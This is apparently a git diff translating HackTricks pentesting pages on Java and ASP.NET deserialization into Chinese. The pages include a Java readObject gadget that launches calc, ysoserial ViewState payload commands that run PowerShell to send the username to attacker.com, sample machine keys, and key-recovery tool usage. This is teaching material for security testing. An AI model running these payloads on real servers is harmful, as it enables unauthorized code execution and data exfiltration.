-        //Serialize the constructed payload and write it to the file
-        File f = new File(file);
-        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
-        out.writeObject(instance);
-        out.flush();
-        out.close();
-    }
-    public static void payloadTest(String file) throws Exception {
-        //Read the written payload and deserialize it
-        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
-        Object obj = in.readObject();
-        System.out.println(obj);
-        in.close();
-    }
-    public static void main(String[] args) throws Exception {
-        // Example to call Person with a Dog
-        Animal animal = new Dog();
-        Person person = new Person(animal);
-        GeneratePayload(person,"test.ser");
-        payloadTest("test.ser");
-        // Example to call Person with a Cat
-        //Animal animal = new Cat();
-        //Person person = new Person(animal);
-        //GeneratePayload(person,"test.ser");
-        //payloadTest("test.ser");
-    }
+interface Animal {
+public void eat();
+}
+//Class must implements Serializable to be serializable
+public static class Cat implements Animal,Serializable {
+@Override
+public void eat() {
+System.out.println("cat eat fish");
+}
+}
+//Class must implements Serializable to be serializable
+public static class Dog implements Animal,Serializable {
+@Override
+public void eat() {
+try {
+Runtime.getRuntime().exec("calc");
+} catch (IOException e) {
+e.printStackTrace();
+}
+System.out.println("dog eat bone");
+}
+}
+//Class must implements Serializable to be serializable
+public static class Person implements Serializable {
+private Animal pet;
+public Person(Animal pet){
+this.pet = pet;
+}
+//readObject implementation, will call the readObject from ObjectInputStream  and then call pet.eat()
+private void readObject(java.io.ObjectInputStream stream)
+throws IOException, ClassNotFoundException {
+pet = (Animal) stream.readObject();
+pet.eat();
+}
+}
+public static void GeneratePayload(Object instance, String file)
+throws Exception {
+//Serialize the constructed payload and write it to the file
+File f = new File(file);
+ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
+out.writeObject(instance);
+out.flush();
+out.close();
+}
+public static void payloadTest(String file) throws Exception {
+//Read the written payload and deserialize it
+ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
+Object obj = in.readObject();
+System.out.println(obj);
+in.close();
+}
+public static void main(String[] args) throws Exception {
+// Example to call Person with a Dog
+Animal animal = new Dog();
+Person person = new Person(animal);
+GeneratePayload(person,"test.ser");
+payloadTest("test.ser");
+// Example to call Person with a Cat
+//Animal animal = new Cat();
+//Person person = new Person(animal);
+//GeneratePayload(person,"test.ser");
+//payloadTest("test.ser");
+}
 }
 ```
+## 结论
 
-## Conclusion
-
-As you can see in this very basic example, the "vulnerability" here appears because the **readObject** function is **calling other vulnerable functions**.
+正如您在这个非常基本的示例中所看到的，这里的“漏洞”出现是因为 **readObject** 函数 **调用了其他易受攻击的函数**。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
index d3716eac1..5994eae44 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md
@@ -1,6 +1,5 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the amazing post from** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
+**查看来自** [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) **的精彩文章**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 5f372789e..0f74ba5b0 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -1,165 +1,138 @@
-# Exploiting \_\_VIEWSTATE without knowing the secrets
+# 利用 \_\_VIEWSTATE 而不知其秘密
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
-## What is ViewState
+## 什么是 ViewState
 
-**ViewState** serves as the default mechanism in ASP.NET to maintain page and control data across web pages. During the rendering of a page's HTML, the current state of the page and values to be preserved during a postback are serialized into base64-encoded strings. These strings are then placed in hidden ViewState fields.
+**ViewState** 是 ASP.NET 中用于在网页之间保持页面和控件数据的默认机制。在渲染页面的 HTML 时，页面的当前状态和在回发期间要保留的值被序列化为 base64 编码的字符串。这些字符串随后被放置在隐藏的 ViewState 字段中。
 
-ViewState information can be characterized by the following properties or their combinations:
+ViewState 信息可以通过以下属性或其组合来表征：
 
-- **Base64**:
-  - This format is utilized when both `EnableViewStateMac` and `ViewStateEncryptionMode` attributes are set to false.
-- **Base64 + MAC (Message Authentication Code) Enabled**:
-  - Activation of MAC is achieved by setting the `EnableViewStateMac` attribute to true. This provides integrity verification for ViewState data.
-- **Base64 + Encrypted**:
-  - Encryption is applied when the `ViewStateEncryptionMode` attribute is set to true, ensuring the confidentiality of ViewState data.
+- **Base64**：
+- 当 `EnableViewStateMac` 和 `ViewStateEncryptionMode` 属性都设置为 false 时，使用此格式。
+- **Base64 + MAC（消息认证码）启用**：
+- 通过将 `EnableViewStateMac` 属性设置为 true 来激活 MAC。这为 ViewState 数据提供完整性验证。
+- **Base64 + 加密**：
+- 当 `ViewStateEncryptionMode` 属性设置为 true 时应用加密，以确保 ViewState 数据的机密性。
 
-## Test Cases
+## 测试用例
 
-The image is a table detailing different configurations for ViewState in ASP.NET based on the .NET framework version. Here's a summary of the content:
+该图像是一个表，详细说明了基于 .NET 框架版本的 ASP.NET 中 ViewState 的不同配置。以下是内容摘要：
 
-1. For **any version of .NET**, when both MAC and Encryption are disabled, a MachineKey is not required, and thus there's no applicable method to identify it.
-2. For **versions below 4.5**, if MAC is enabled but Encryption is not, a MachineKey is required. The method to identify the MachineKey is referred to as "Blacklist3r."
-3. For **versions below 4.5**, regardless of whether MAC is enabled or disabled, if Encryption is enabled, a MachineKey is needed. Identifying the MachineKey is a task for "Blacklist3r - Future Development."
-4. For **versions 4.5 and above**, all combinations of MAC and Encryption (whether both are true, or one is true and the other is false) necessitate a MachineKey. The MachineKey can be identified using "Blacklist3r."
+1. 对于 **任何版本的 .NET**，当 MAC 和加密都被禁用时，不需要 MachineKey，因此没有适用的方法来识别它。
+2. 对于 **4.5 版本以下**，如果启用了 MAC 但未启用加密，则需要 MachineKey。识别 MachineKey 的方法称为 "Blacklist3r"。
+3. 对于 **4.5 版本以下**，无论 MAC 是否启用，如果启用了加密，则需要 MachineKey。识别 MachineKey 是 "Blacklist3r - Future Development" 的任务。
+4. 对于 **4.5 版本及以上**，所有 MAC 和加密的组合（无论两者都为 true，还是一个为 true 另一个为 false）都需要 MachineKey。可以使用 "Blacklist3r" 识别 MachineKey。
 
-### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
-
-It is also possible to disable the ViewStateMAC completely by setting the `AspNetEnforceViewStateMac` registry key to zero in:
+### 测试用例：1 – EnableViewStateMac=false 和 viewStateEncryptionMode=false
 
+还可以通过将 `AspNetEnforceViewStateMac` 注册表项设置为零来完全禁用 ViewStateMAC：
 ```
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
 ```
+**识别 ViewState 属性**
 
-**Identifying ViewState Attributes**
-
-You can try to identify if ViewState is MAC protected by capturing a request containing this parameter with BurpSuite. If Mac is not used to protect the parameter you can exploit it using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
-
+您可以尝试通过使用 BurpSuite 捕获包含此参数的请求来识别 ViewState 是否受到 MAC 保护。如果未使用 Mac 保护该参数，您可以使用 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) 进行利用。
 ```
 ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
 ```
-
 ### Test case 1.5 – Like Test case 1 but the ViewState cookie isn't sent by the server
 
-Developers can **remove ViewState** from becoming part of an HTTP Request (the user won't receive this cookie).\
-One may assume that if **ViewState** is **not present**, their implementation is **secure** from any potential vulnerabilities arising with ViewState deserialization.\
-However, that is not the case. If we **add ViewState parameter** to the request body and send our serialized payload created using ysoserial, we will still be able to achieve **code execution** as shown in **Case 1**.
+开发人员可以**移除 ViewState**，使其不成为 HTTP 请求的一部分（用户将不会收到此 cookie）。\
+人们可能会假设，如果**ViewState**不**存在**，他们的实现就**安全**，不会出现与 ViewState 反序列化相关的潜在漏洞。\
+然而，事实并非如此。如果我们**将 ViewState 参数**添加到请求体中，并发送我们使用 ysoserial 创建的序列化有效负载，我们仍然能够实现**代码执行**，如**案例 1**所示。
 
 ### Test Case: 2 – .Net < 4.5 and EnableViewStateMac=true & ViewStateEncryptionMode=false
 
-In order to **enable ViewState MAC** for a **specific page** we need to make following changes on a specific aspx file:
-
+为了**启用 ViewState MAC**，我们需要在特定的 aspx 文件上进行以下更改：
 ```bash
 <%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
 ```
-
-We can also do it for **overall** application by setting it on the **web.config** file as shown below:
-
+我们还可以通过在 **web.config** 文件中设置它来实现 **整体** 应用，如下所示：
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <configuration>
 <system.web>
 <customErrors mode="Off" />
- <machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
- <pages enableViewStateMac="true" />
+<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
+<pages enableViewStateMac="true" />
 </system.web>
 </configuration>
 ```
+由于该参数受到MAC保护，因此要成功执行攻击，我们首先需要使用的密钥。
 
-As the parameter is MAC protected this time to successfully execute the attack we first need the key used.
-
-You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key used.
-
+您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) 来查找使用的密钥。
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
 
 --encrypteddata : __VIEWSTATE parameter value of the target application
 --modifier : __VIWESTATEGENERATOR parameter value
 ```
+[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) 是另一个可以识别已知 machineKeys 的工具。它是用 Python 编写的，因此与 Blacklist3r 不同，没有 Windows 依赖。对于 .NET viewstates，有一个 "python blacklist3r" 工具，这是使用它的最快方法。
 
-[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) is another tool which can identify known machineKeys. It is written in Python, so unlike Blacklist3r, there is no Windows dependency. For .NET viewstates, there is a "python blacklist3r" utility, which is the quickest way to use it.
-
-It can either be supplied with the viewstate and generator directly:
-
+它可以直接提供 viewstate 和 generator：
 ```
 pip install badsecrets
 git clone https://github.com/blacklanternsecurity/badsecrets
 cd badsecrets
 python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
 ```
-
-![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)
-
-Or, it can connect directly to the target URL and try to carve the viewstate out of the HTML:
-
+或者，它可以直接连接到目标 URL 并尝试从 HTML 中提取 viewstate：
 ```
 pip install badsecrets
 git clone https://github.com/blacklanternsecurity/badsecrets
 cd badsecrets
 python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
 ```
-
 ![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)
 
-To search for vulnerable viewstates at scale, in conjunction with subdomain enumeration, the `badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) module can be used:
-
+为了大规模搜索易受攻击的 viewstate，结合子域枚举，可以使用 `badsecrets` [**BBOT**](exploiting-__viewstate-parameter.md) 模块：
 ```
 bbot -f subdomain-enum -m badsecrets -t evil.corp
 ```
-
 ![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)
 
-If you are lucky and the key is found,you can proceed with the attack using [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
-
+如果你运气好并且找到了密钥，你可以使用 [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**：
 ```
 ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 
 --generator = {__VIWESTATEGENERATOR parameter value}
 ```
-
-In cases where `_VIEWSTATEGENERATOR` parameter **isn't sent** by the server you **don't** need to **provide** the `--generator` parameter **but these ones**:
-
+在服务器**未发送**`_VIEWSTATEGENERATOR`参数的情况下，您**不需要**提供`--generator`参数**而是这些**：
 ```bash
 --apppath="/" --path="/hello.aspx"
 ```
+### 测试用例：3 – .Net < 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true
 
-### Test Case: 3 – .Net < 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true
+在这种情况下，不知道该参数是否受到MAC保护。因此，值可能被加密，您将**需要机器密钥来加密您的有效负载**以利用该漏洞。
 
-In this it's not known if the parameter is protected with MAC. Then, the value is probably encrypted and you will **need the Machine Key to encrypt your payload** to exploit the vulnerability.
+**在这种情况下，** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **模块正在开发中...**
 
-**In this case the** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **module is under development...**
+**在 .NET 4.5 之前，** ASP.NET 可以**接受**来自用户的**未加密** \_`__VIEWSTATE`\_ 参数，即使**`ViewStateEncryptionMode`**已设置为_**始终**_。ASP.NET **仅检查**请求中**`__VIEWSTATEENCRYPTED`**参数的**存在**。**如果删除此参数并发送未加密的有效负载，它仍然会被处理。**
 
-**Prior to .NET 4.5**, ASP.NET can **accept** an **unencrypted** \_`__VIEWSTATE`\_parameter from the users **even** if **`ViewStateEncryptionMode`** has been set to _**Always**_. ASP.NET **only checks** the **presence** of the **`__VIEWSTATEENCRYPTED`** parameter in the request. **If one removes this parameter, and sends the unencrypted payload, it will still be processed.**
+因此，如果攻击者通过其他漏洞（如文件遍历）找到获取机器密钥的方法，可以使用在**案例 2**中使用的[**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)命令，通过ViewState反序列化漏洞执行RCE。
 
-Therefore if the attackers find a way to get the Machinekey via another vuln like file traversal, [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) command used in the **Case 2**, can be used to perform RCE using ViewState deserialization vulnerability.
+- 从请求中删除`__VIEWSTATEENCRYPTED`参数，以利用ViewState反序列化漏洞，否则将返回Viewstate MAC验证错误，利用将失败。
 
-- Remove `__VIEWSTATEENCRYPTED` parameter from the request in order to exploit the ViewState deserialization vulnerability, else it will return a Viewstate MAC validation error and exploit will fail.
-
-### Test Case: 4 – .Net >= 4.5 and EnableViewStateMac=true/false and ViewStateEncryptionMode=true/false except both attribute to false
-
-We can force the usage of ASP.NET framework by specifying the below parameter inside the web.config file as shown below.
+### 测试用例：4 – .Net >= 4.5 和 EnableViewStateMac=true/false 和 ViewStateEncryptionMode=true/false，除了两个属性为false
 
+我们可以通过在web.config文件中指定以下参数来强制使用ASP.NET框架，如下所示。
 ```xml
 <httpRuntime targetFramework="4.5" />
 ```
-
-Alternatively, this can be done by specifying the below option inside the `machineKey` paramter of web.config file.
-
+另外，这可以通过在 web.config 文件的 `machineKey` 参数中指定以下选项来完成。
 ```bash
 compatibilityMode="Framework45"
 ```
+如前所述，**值是加密的。** 然后，要发送**有效的有效负载，攻击者需要密钥**。
 
-As in the previous the **value is encrypted.** Then, to send a **valid payload the attacker need the key**.
-
-You can try to use [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)to find the key being used:
-
+您可以尝试使用 [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) 来查找正在使用的密钥：
 ```
 AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"
 
@@ -167,46 +140,39 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47Lw
 --IISDirPath = {Directory path of website in IIS}
 --TargetPagePath = {Target page path in application}
 ```
+对于IISDirPath和TargetPagePath的更详细描述，请[参阅此处](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
 
-For a more detailed description for IISDirPath and TargetPagePath [refer here](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
-
-Or, with [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (with a generator value):
-
+或者，使用[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)（带生成器值）：
 ```bash
 cd badsecrets
 python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
 ```
-
 ![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)
 
-Once a valid Machine key is identified, **the next step is to generate a serialized payload using** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
-
+一旦识别出有效的机器密钥，**下一步是使用** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) **生成序列化有效负载**
 ```
 ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
 ```
-
-If you have the value of `__VIEWSTATEGENERATOR` you can try to **use** the `--generator` parameter with that value and **omit** the parameters `--path` and `--apppath`
+如果你有 `__VIEWSTATEGENERATOR` 的值，你可以尝试使用 `--generator` 参数并省略 `--path` 和 `--apppath` 参数。
 
 ![](https://notsosecure.com/sites/all/assets/group/nss_uploads/2019/06/4.2.png)
 
-A successful exploitation of the ViewState deserialization vulnerability will lead to an out-of-band request to an attacker-controlled server, which includes the username. This kind of exploit is demonstrated in a proof of concept (PoC) which can be found through a resource titled "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". For further details on how the exploitation process works and how to utilize tools like Blacklist3r for identifying the MachineKey, you can review the provided [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC).
+成功利用 ViewState 反序列化漏洞将导致向攻击者控制的服务器发出带有用户名的带外请求。这种利用方式在一个概念验证（PoC）中得到了展示，该 PoC 可以通过名为 "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET" 的资源找到。有关利用过程如何工作的更多细节，以及如何使用像 Blacklist3r 这样的工具来识别 MachineKey，你可以查看提供的 [PoC of Successful Exploitation](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC)。
 
-### Test Case 6 – ViewStateUserKeys is being used
-
-The **ViewStateUserKey** property can be used to **defend** against a **CSRF attack**. If such a key has been defined in the application and we try to generate the **ViewState** payload with the methods discussed till now, the **payload won’t be processed by the application**.\
-You need to use one more parameter in order to create correctly the payload:
+### 测试用例 6 – ViewStateUserKeys 正在使用中
 
+**ViewStateUserKey** 属性可以用来 **防御** **CSRF 攻击**。如果在应用程序中定义了这样的密钥，并且我们尝试使用到目前为止讨论的方法生成 **ViewState** 有效负载，**有效负载将不会被应用程序处理**。\
+你需要使用一个额外的参数来正确创建有效负载：
 ```bash
 --viewstateuserkey="randomstringdefinedintheserver"
 ```
+### 成功利用的结果 <a href="#poc" id="poc"></a>
 
-### Result of a Successful Exploitation <a href="#poc" id="poc"></a>
+对于所有测试用例，如果 ViewState YSoSerial.Net 有效载荷 **成功** 工作，则服务器响应“**500 内部服务器错误**”，响应内容为“**此页面的状态信息无效，可能已损坏**”，并且我们获得 OOB 请求。
 
-For all the test cases, if the ViewState YSoSerial.Net payload works **successfully** then the server responds with “**500 Internal server error**” having response content “**The state information is invalid for this page and might be corrupted**” and we get the OOB reques.
+查看 [进一步的信息在这里](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
 
-Check for [further information here](<https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/[**https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https:/www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)/README.md>)
-
-## References
+## 参考文献
 
 - [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
 - [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\\
@@ -215,9 +181,8 @@ Check for [further information here](<https://github.com/carlospolop/hacktricks/
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级 **漏洞赏金平台**！今天就加入我们 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index 78b082bc8..470a071ea 100644
--- a/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/src/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -1,76 +1,65 @@
-# Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
+# Java DNS 反序列化，GadgetProbe 和 Java 反序列化扫描器
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## DNS request on deserialization
-
-The class `java.net.URL` implements `Serializable`, this means that this class can be serialized.
+## 反序列化中的 DNS 请求
 
+类 `java.net.URL` 实现了 `Serializable`，这意味着该类可以被序列化。
 ```java
 public final class URL implements java.io.Serializable {
 ```
+这个类有一个**奇怪的行为**。根据文档：“**如果两个主机名可以解析为相同的IP地址，则这两个主机被视为等效**”。\
+因此，每当一个URL对象调用**任何**的**函数`equals`**或**`hashCode`**时，都会**发送**一个**DNS请求**以获取IP地址。
 
-This class have a **curious behaviour.** From the documentation: “**Two hosts are considered equivalent if both host names can be resolved into the same IP addresses**”.\
-Then, every-time an URL object calls **any** of the **functions `equals`** or **`hashCode`** a **DNS request** to get the IP Address is going to be **sent**.
-
-**Calling** the function **`hashCode`** **from** an **URL** object is fairly easy, it's enough to insert this object inside a `HashMap` that is going to be deserialized. This is because **at the end** of the **`readObject`** function from `HashMap` this code is executed:
-
+**从**一个**URL**对象调用**`hashCode`**函数非常简单，只需将该对象插入到一个将要被反序列化的`HashMap`中即可。这是因为在`HashMap`的**`readObject`**函数的**最后**，会执行以下代码：
 ```java
 private void readObject(java.io.ObjectInputStream s)
-        throws IOException, ClassNotFoundException {
-        [   ...   ]
-    for (int i = 0; i < mappings; i++) {
-        [   ...   ]
-        putVal(hash(key), key, value, false, false);
-    }
-```
-
-It is **going** the **execute** `putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
-
-```java
-static final int hash(Object key) {
-    int h;
-    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
+throws IOException, ClassNotFoundException {
+[   ...   ]
+for (int i = 0; i < mappings; i++) {
+[   ...   ]
+putVal(hash(key), key, value, false, false);
 }
 ```
-
-As you can observe, **when deserializing** a **`HashMap`** the function `hash` is going to **be executed with every object** and **during** the **`hash`** execution **it's going to be executed `.hashCode()` of the object**. Therefore, if you **deserializes** a **`HashMap`** **containing** a **URL** object, the **URL object** will **execute** `.hashCode()`.
-
-Now, lets take a look to the code of `URLObject.hashCode()` :
-
+它将**执行** `putVal`，使用 `HashMap` 中的每个值。但更相关的是对每个值的 `hash` 调用。以下是 `hash` 函数的代码：
 ```java
- public synchronized int hashCode() {
-        if (hashCode != -1)
-            return hashCode;
-
-        hashCode = handler.hashCode(this);
-        return hashCode;
+static final int hash(Object key) {
+int h;
+return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
+}
 ```
+如您所见，**在反序列化**一个**`HashMap`**时，函数`hash`将**对每个对象执行**，并且**在**`hash`执行期间**将执行对象的`.hashCode()`。因此，如果您**反序列化**一个**包含**URL对象的**`HashMap`**，则**URL对象**将**执行**`.hashCode()`。
 
-As you can see, when a `URLObject` executes`.hashCode()` it is called `hashCode(this)`. A continuation you can see the code of this function:
-
+现在，让我们来看一下`URLObject.hashCode()`的代码：
 ```java
- protected int hashCode(URL u) {
-        int h = 0;
+public synchronized int hashCode() {
+if (hashCode != -1)
+return hashCode;
 
-        // Generate the protocol part.
-        String protocol = u.getProtocol();
-        if (protocol != null)
-            h += protocol.hashCode();
-
-        // Generate the host part.
-        InetAddress addr = getHostAddress(u);
-        [   ...   ]
+hashCode = handler.hashCode(this);
+return hashCode;
 ```
+如您所见，当 `URLObject` 执行 `.hashCode()` 时，它被称为 `hashCode(this)`。接下来，您可以看到此函数的代码：
+```java
+protected int hashCode(URL u) {
+int h = 0;
 
-You can see that a `getHostAddress` is executed to the domain, **launching a DNS query**.
+// Generate the protocol part.
+String protocol = u.getProtocol();
+if (protocol != null)
+h += protocol.hashCode();
 
-Therefore, this class can be **abused** in order to **launch** a **DNS query** to **demonstrate** that **deserialization** is possible, or even to **exfiltrate information** (you can append as subdomain the output of a command execution).
+// Generate the host part.
+InetAddress addr = getHostAddress(u);
+[   ...   ]
+```
+您可以看到对域名执行了 `getHostAddress`，**发起了 DNS 查询**。
 
-### URLDNS payload code example
+因此，这个类可以被**滥用**以**发起**一个**DNS 查询**，以**演示****反序列化**是可能的，甚至可以**外泄信息**（您可以将命令执行的输出作为子域名附加）。
 
-You can find the [URDNS payload code from ysoserial here](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). However, just for make it easier to understand how to code it I created my own PoC (based on the one from ysoserial):
+### URLDNS 负载代码示例
 
